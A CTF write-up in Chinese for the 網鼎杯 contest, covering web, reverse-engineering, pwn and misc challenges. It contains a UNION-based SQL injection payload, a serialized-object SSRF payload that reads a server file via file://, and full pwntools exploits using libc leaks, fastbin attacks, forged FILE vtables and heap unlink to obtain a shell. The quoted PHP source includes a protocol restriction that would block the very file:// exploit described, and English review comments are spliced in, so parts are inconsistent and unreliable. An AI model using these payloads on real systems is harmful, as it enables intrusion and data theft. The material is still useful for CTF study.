網鼎杯
這次還行很開心

挺滿足
題目列表
web
首先訪問robots.txt

存在備份泄露，把user.php.bak下載下來
<?php
class UserInfo
{
public $name = "";   // stored as given by the constructor
public $age = 0;     // the constructor stores (int)$age
public $blog = "";   // URL that getBlogContents() hands to get(); isValidBlog() only checks its format
/**
 * Populate the three public fields.
 *
 * @param string $name  stored unchanged
 * @param mixed  $age   coerced with an (int) cast before being stored
 * @param string $blog  stored unchanged; no validation happens here
 */
public function __construct($name, $age, $blog)
{
    $this->blog = $blog;
    $this->name = $name;
    $this->age  = (int) $age;
}
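/**
 * Fetch $url with cURL and return the response body.
 *
 * @param string $url  request target; in this class it is $this->blog, which
 *                     is user-controlled (set by the constructor or by unserialize())
 * @return string|int|false  the body on success, the int 404 when the server
 *                           answered 404, false when curl_exec() itself failed
 */
function get($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // A blog URL only makes sense over HTTP(S). Without this restriction cURL
    // also honours file:// and other non-HTTP schemes, so a crafted $url turns
    // this fetch into a local-file read / SSRF primitive.
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    $output = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    // Release the handle on every path; the original returned on 404 before closing it.
    curl_close($ch);
    if ($httpCode == 404) {
        return 404;
    }
    return $output;
}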
/**
 * Download the stored blog URL and return whatever get() returns.
 *
 * Nothing here calls isValidBlog() first: the URL is fetched exactly as stored.
 *
 * @return string|int|false  see get()
 */
public function getBlogContents()
{
    $url = $this->blog;
    return $this->get($url);
}
/**
 * Check that $this->blog looks like [http(s)://]host[:port][/path].
 *
 * Purely syntactic: the scheme is optional, nothing is resolved or fetched,
 * and get() does not consult this check.
 *
 * @return int|false  1 on match, 0 on no match, false on a regex error
 */
public function isValidBlog()
{
    $pattern = "/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i";
    return preg_match($pattern, $this->blog);
}
注冊一個賬號，發現
view.php的no參數是可以注入的

payload:/view.php?no=-6 unIon/**/select 1,table_name,3,4 from information_schema.tables where table_schema=database()

可以注入出表名
也可以注入出列名
from information_schema.columns where table_schema=database() limit 0,3
分別是
no
，username
，password
，data
查看data的數據會發現是一個序列化的數據

它沒有查找到東西就沒有調用
getBlogContents()
而且用了php的
unserialize()
函數，所以我們可以通過反序列化來實現ssrf讀取任意文件
/view.php?no=1 unIon/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:6:"ckj123";s:3:"age";i:111111;s:4:"blog";s:29:"file:///var/www/html/flag.php";} '

re
Advance
d語言
..講道理我是猜的 給的那一串東西decode hex后為這樣一個(gè)字符串:
“K@LKVHr[DXEsLsYI@\AMYIr\EIZQ”
然后猜異或就出來了..
腳本
# The hex-decoded challenge string; the author guessed a repeating two-byte
# XOR key (45 on even positions, 44 on odd positions) and it produced the flag.
stringA = r'K@LKVHr[DXEsLsYI@\AMYIr\EIZQ'
flag = ''.join(
    chr(ord(ch) ^ (45 if pos % 2 == 0 else 44))
    for pos, ch in enumerate(stringA)
)
print(flag)
Beijing
# Alphabet recovered from the binary and the index sequence it is read with;
# the flag is simply the alphabet characters picked in that order.
string = 'aginbefjml{z}_W'
num = [6, 9, 0, 1, 0xa, 0, 8, 0, 0xb, 2, 3, 1, 0xd, 4, 5, 2, 7, 2, 3, 1, 0xc]
flag = ''.join(string[i] for i in num)
print(flag)
flag{amazing_beijing}
pwn
GUESS
fork出的進程所以不怕崩，直接通過___stack_chk_fail()打印出libc地址，然後通過libc里的環境變量打印出棧地址，最後打印出棧里的flag，剛好三次
#coding=utf8
from pwn import *
# pwntools session setup. `local` toggles between a local process and the
# challenge host; both branches load the same binary and the same libc file.
# NOTE(review): the libc offsets used later (puts, environ) only hold if the
# remote libc is this exact build -- nothing below verifies that.
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
local = 0
if local:
    cn = process('./guess')
    bin = ELF('./guess')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    #libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
else:
    cn = remote('106.75.90.160',9999)
    bin = ELF('./guess')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def z(a=''):
    """Attach gdb to the live target `cn`.

    `a` is the gdb command script passed to gdb.attach. When it is empty the
    script pauses on raw_input() so the debugger can be driven by hand before
    the exploit continues.
    """
    wait_for_user = (a == '')
    gdb.attach(cn, a)
    if wait_for_user:
        raw_input()
# Three probes, one per round of the game (writeup: "剛好三次").
# Round 1: flood the guess with a GOT address. Per the writeup the overflow
# trips __stack_chk_fail, and the text after "***: " in its abort message
# is read through the overwritten pointer -- here a libc address.
cn.sendline(p64(0x602020)*200)
cn.recvuntil('***: ')
# Take the 6 significant bytes of the leaked pointer, pad to 8, subtract puts.
# NOTE(review): assumes 0x602020 is the GOT slot of puts -- confirm in the binary.
lbase = u64(cn.recvuntil('\x7f').ljust(8,'\x00')) - libc.sym['puts']
print('lbase:' + hex(lbase))
# Round 2: same trick with libc's `environ`, which holds a stack pointer.
env = lbase + libc.sym['environ']
cn.sendline(p64(env)*200)
cn.recvuntil('***: ')
# 0x168: presumably the author's measured distance from the environ value to
# the buffer holding the flag -- verify against the binary before reuse.
sbase = u64(cn.recvuntil('\x7f').ljust(8,'\x00')) - 0x168
print('sbase:' + hex(sbase))
# Round 3: point the message at the flag buffer itself.
cn.sendline(p64(sbase)*200)
#z('c')
# Defensive note: this only works because the forking server keeps the same
# canary and layout for every child, so a crashed probe costs nothing; newer
# glibc builds also no longer echo the program name in this abort message.
cn.interactive()
blind
有fastbin atk能任意地址寫但沒有leak，而且got表也不可寫，但能偽造bss上的文件指針，使用自己偽造的虛表執行getshell函數
from pwn import *
context.log_level='debug'
# Challenge host; the commented-out line is the local-process alternative.
p=remote('106.75.20.44',9999)
#p=process('./blind')
# Consume whatever the service prints first (presumably the menu) before
# the helpers below start matching prompts.
p.recv()
def pr():
    """Wait until the next menu prompt (text ending in 'ice:', presumably 'Choice:') has arrived."""
    p.recvuntil('ice:')
def new(index,content,sh=0):
    """Menu option 1: create entry `index` with `content` (sent as a line).

    With sh=1 the script drops to interactive right after sending the
    payload; otherwise it waits for the next prompt via pr().
    """
    p.send('1\n')
    p.recvuntil('Index:')
    p.send(str(index))
    p.recvuntil(':')
    p.sendline(content)
    if sh==1:
        p.interactive()
    pr()
def change(index,content,sh=0):
    """Menu option 2: overwrite entry `index` with `content` (sent as a line).

    Same prompt sequence as new(); sh=1 goes interactive right after the
    payload is sent, which the last write() of the script relies on.
    """
    p.send('2\n')
    p.recvuntil('Index:')
    p.send(str(index))
    p.recvuntil(':')
    p.sendline(content)
    if sh==1:
        p.interactive()
    pr()
def free(index):
    """Menu option 3: delete entry `index`, then wait for the next prompt."""
    p.send('3\n')
    p.recvuntil('Index:')
    p.send(str(index))
    pr()
def write(addr, v, sh=0):
    """Write `v` at `addr` using two change() calls.

    Relies on table slot 0 pointing at the entry table itself (0x602060),
    which the new(3, ...) call earlier in the script sets up: rewriting slot 0
    as [0x602060, addr] makes slot 1 point at `addr`, and the second change()
    then stores `v` there. `sh` is forwarded to that second call.
    """
    table_prefix = p64(0x602060) + p64(addr)
    change(0, table_prefix)
    change(1, v, sh)
# Fixed addresses from the challenge binary (used as absolutes, so the
# binary is presumably non-PIE).
puts=0x601FA0      # not used below
ptr=0x602060       # not used below; the entry table on .bss (see new(3, ...))
target=0x60201d    # where the poisoned fastbin hands out the next chunk
shell=0x4008E3     # the binary's own getshell function (writeup)
# Free entry 0, then rewrite its fd through the stale pointer (use-after-free),
# so the fastbin now chains to `target`.
new(0,"asdasd")
free(0)
change(0,p64(target))
# new(5) takes chunk 0 back out of the bin; new(3) then receives `target`.
new(5,p64(shell)*10)
# 0x60201d + 0x10 (header) + 3 + 0x30 = 0x602060, so the trailing p64 stores
# 0x602060 into table slot 0: slot 0 now points at the table itself, which is
# the primitive write() builds on.
new(3,'\x00'*3+'\x00'*0x30+p64(0x602060))
# Forge a FILE object at 0x602100 (0xfbada887 looks like an _IO_FILE flags
# word) whose vtable pointer at 0x6021d8 names a table filled with `shell`,
# then swap the .bss file pointer at 0x602020 for it (writeup: 偽造bss上的
# 文件指針 / 自己偽造的虛表). sh=1 goes interactive immediately, before the
# swapped pointer is used by the next I/O.
write(0x602100,p64(0xfbada887)+p64(0)*7+p64(1))
write(0x6021d8,p64(0x602200))
write(0x602200, p64(shell)*8)
write(0x602020,p64(0x602100),1)
# Defensive note: the vtable forgery presupposes a libc without _IO vtable
# validation (added in glibc 2.24); later versions abort instead of calling
# into the forged table.
p.interactive()
babyheap
fastbin attack leak出heap地址,
unlink 改bss(次數應該不夠，去修改那個計數器能無限續)
#coding=utf8
from pwn import *
# pwntools session setup. `local` toggles between a local process and the
# challenge host; both branches load the same binary and libc file.
# NOTE(review): the libc symbols used later (free, __free_hook, system) only
# line up if the remote libc is this exact build -- not verified anywhere.
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
local = 0
if local:
    cn = process('./babyheap')
    bin = ELF('./babyheap',checksec=False)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
else:
    cn = remote('106.75.67.115', 9999)
    bin = ELF('./babyheap',checksec=False)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
    pass
def z(a=''):
    """Attach gdb to the live target `cn`.

    `a` is the gdb command script passed to gdb.attach. With an empty script
    the exploit pauses on raw_input() so the debugger can be driven by hand.
    """
    wait_for_user = (a == '')
    gdb.attach(cn, a)
    if wait_for_user:
        raw_input()
def add(idx,con):
    """Menu option 1: allocate entry `idx` and fill it with `con` (sent as a line)."""
    cn.sendlineafter('Choice:','1')
    cn.sendlineafter(':',str(idx))
    cn.sendlineafter(':',con)
def edit(idx,con):
    """Menu option 2: overwrite entry `idx` with `con` (sent as a line).

    The script also calls this on entries it has already deleted, i.e. the
    service does not clear table slots on delete.
    """
    cn.sendlineafter('Choice:','2')
    cn.sendlineafter(':',str(idx))
    cn.sendlineafter(':',con)
def dele(idx):
    """Menu option 4: free entry `idx`."""
    cn.sendlineafter('Choice:','4')
    cn.sendlineafter(':',str(idx))
def show(idx):
    """Menu option 3: print entry `idx`; the caller reads the reply with recvuntil('\\n')."""
    cn.sendlineafter('Choice:','3')
    cn.sendlineafter(':',str(idx))
# Five entries; 0 and 4 carry fake size words (0x30 / 0x21) that later
# frees and allocations are meant to see as valid chunk headers.
add(0,p64(0x30)*3+'\x30')
add(1,'asd')
add(2,'asd')
add(3,'asd')
add(4,p64(0)+p64(0x21))
# Free two same-size entries and show the second one after freeing it: its
# fastbin fd points at the other chunk, which leaks the heap (writeup:
# "fastbin attack leak出heap地址"). 0x60 is presumably the distance from that
# fd to the heap start -- confirm before reuse.
dele(2)
dele(3)
show(3)
hbase=u64(cn.recvuntil('\n')[:-1].ljust(8,'\x00'))-0x60
success(hex(hbase))
# Still writable after free: redirect the fastbin fd to hbase+0x20.
edit(3,p64(hbase+0x20))
dele(0)
add(9,p64(0)+p64(0x21)+p64(0x30)+p32(0x30))
# z()
add(6,'/bin/sh')
add(7,p64(0x20)+p64(0x90))
# Rebuild entry 0 with fd/bk aimed at table slot 9 (0x602060 + 9*8) minus
# 0x18 / 0x10 -- the unlink() preconditions. Freeing entry 1 then performs
# the unlink, which leaves slot 9 pointing back into the table (writeup:
# "unlink 改bss").
dele(0)
add(8,p64(0)+p64(0x21)+p64(0x0602060-0x18+9*8)+p32(0x0602060-0x10+9*8))
dele(1)
# z('b*0x0000000000400C86\nc')
# Through slot 9, rewrite slots 6..9 so that slot 9 names free@GOT; showing
# it leaks the libc address of free.
edit(9,p64(0x000000000602098)*2+p64(0x0000000006020B0)+p32(bin.got['free']))
show(9)
lbase=u64(cn.recvuntil('\n')[:-1].ljust(8,'\x00'))-libc.sym['free']
success(hex(lbase))
# z('b*0x0000000000400B1D\nc')
# Entry 8 points at 0x6020B0, presumably the operation counter the writeup
# says must be reset ("去修改那個計數器能無限續"); it is zeroed before each
# further edit. Slot 9 is then retargeted at __free_hook and filled with
# system; dele(3) frees the '/bin/sh' chunk through the hook.
edit(8,p64(0))
edit(7,p64(0x000000000602098)+p64(0x0000000006020B0)+p64(lbase+libc.sym['__free_hook'])[:-1])
edit(8,p64(0))
edit(9,p64(lbase+libc.sym['system'])[:-1])
# z('b free\nc')
dele(3)
# z()
# Defensive note: every step above goes through show()/edit() on an entry
# that was already deleted; nulling the table slot on delete and bounding
# edit() to the allocation size removes the read and write primitives.
cn.interactive()
misc
clip
下載下來之後有這兩個文件


告訴我們要切割
用010editor
打開damaged.disk
會在里面找到兩個(gè)

然後將這兩張png分別拿出來補齊文件頭和文件尾
前面加上
89 50 4E 47 0D 0A 1A 0A
后面加上
00 00 00 00 49 45 4E 44 AE 42 60 82
就可以得到兩張圖片了


然後將兩張圖片切成數個圖拼起來得到flag
